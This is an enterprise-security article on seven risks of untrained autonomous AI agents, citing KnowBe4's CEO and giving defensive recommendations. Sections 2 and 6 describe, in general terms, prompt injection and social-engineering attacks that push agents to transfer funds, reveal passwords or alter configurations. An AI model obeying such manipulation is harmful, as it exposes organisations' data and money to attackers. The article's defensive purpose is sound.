7 Critical Security Risks of Untrained AI Agents — And How to Address Them

The rise of autonomous AI agents promises a productivity revolution for enterprises, but it also introduces a new class of security vulnerabilities. These agents, designed to act independently, lack the innate caution of human employees — they don't know that bad actors exist. According to Stu Sjouwerman, CEO of KnowBe4, this naivety makes them prime targets for exploitation. As organizations rush to deploy AI without robust governance, the gap between adoption and security is widening. This article explores seven key threats posed by untrained AI agents and offers actionable strategies to mitigate them.

1. The Dual-Threat Landscape of AI Security

Enterprises face a dual challenge: AI agents boost productivity but also expand the attack surface. The same autonomy that enables them to handle complex tasks allows attackers to manipulate them. Most organizations have no governance framework to manage either risk — they lack policies for how AI should respond to requests, what data it can access, or how it should verify user identity. This creates a scenario where agents can inadvertently expose sensitive information or execute harmful actions. To close the gap, companies must implement security-by-design principles from the start, integrating governance into AI development rather than as an afterthought.

2. AI Agents Don't Recognize Malicious Intent

Unlike humans, who learn from social cues and experience, AI agents operate on predefined rules or trained models. Until they are specifically trained to detect phishing, persuasion, or social engineering tactics, they will treat every request as legitimate. Sjouwerman highlights that these agents “don’t know bad people exist” — they lack the cognitive bias or suspicion that protects humans. This makes them vulnerable to prompt injection attacks, where malicious instructions are hidden inside benign-seeming queries. To counter this, enterprises must incorporate adversarial training data that simulates real-world manipulative scenarios, teaching agents to flag suspicious commands for human review.

3. Expanded Attack Surface Without Visibility

Every connected AI agent represents a new entry point for attackers. Traditional security tools — firewalls, endpoint protection — are not designed to monitor the behavior of autonomous agents. Without proper logging and audit trails, organizations cannot detect when an agent has been compromised or is acting abnormally. This lack of visibility makes it nearly impossible to trace a breach back to its origin. A recommended remediation is to implement agent-specific monitoring dashboards that track input/output patterns, flag anomalies, and require authentication for any action that modifies data or systems.

4. Data Leakage Through Over-Permissive Access

To function effectively, AI agents often require access to vast amounts of corporate data — customer records, internal documents, financials. However, without strict role-based access controls (RBAC), agents may leak data inadvertently. For example, an agent that summarizes emails might expose confidential discussions if it has blanket read permissions. Attackers can exploit this by crafting queries that extract sensitive information piece by piece. Enterprises should apply the principle of least privilege: grant agents only the minimum data access needed for their task, and require explicit user confirmation before releasing any data to external parties.

5. Lack of Governance Frameworks Accelerates Risk

The speed of AI adoption has outstripped the creation of governance frameworks. Many organizations deploy AI agents without defined policies for acceptable use, data handling, or incident response. This governance gap is the defining security risk of the current era, as Sjouwerman notes. Without clear guidelines, employees may unknowingly give agents harmful commands, or agents may autonomously engage in risky behavior. To address this, companies should establish an AI Governance Board that includes security, legal, and business leaders. They should create a charter that outlines agent behavior limits, escalation paths for suspicious activity, and periodic security reviews.

6. Social Engineering Attacks on AI Agents

Just as humans can be manipulated, AI agents can be socially engineered — sometimes more easily. Because agents lack emotional intelligence and context awareness, they may follow instructions from unauthorized users who mimic an authoritative tone or spoof internal communications. Attackers can trick an agent into performing actions like transferring funds, revealing passwords, or modifying system configurations. Prevention requires strong identity verification for any command that has security or financial impact. Implement multi-factor authentication for administrative actions, even when initiated through an agent, and train agents to recognize out-of-band verification requests.

7. Path Forward: Continuous Training and Human Oversight

The solution is not to abandon AI agents but to train them continuously. Just as organizations conduct security awareness training for employees, they must run simulated attacks against their AI agents. This includes red-teaming agents with social engineering payloads, prompt injections, and privilege escalation attempts. Furthermore, critical decisions should always require a human-in-the-loop — an agent can recommend, but a human must approve. By combining ongoing training with human oversight, enterprises can harness the power of autonomous agents without becoming victims of their naivety.

In conclusion, the rise of untrained AI agents presents a clear and present danger to enterprise security. From governance gaps to social engineering vulnerability, the risks are real but manageable. Organizations that act now to implement governance frameworks, train their agents, and maintain human oversight will be best positioned to safely leverage AI’s transformative potential. The key takeaway from KnowBe4’s CEO is simple: treat your AI agents like new employees — onboard them with security training, monitor their behavior, and never assume they know that bad people exist.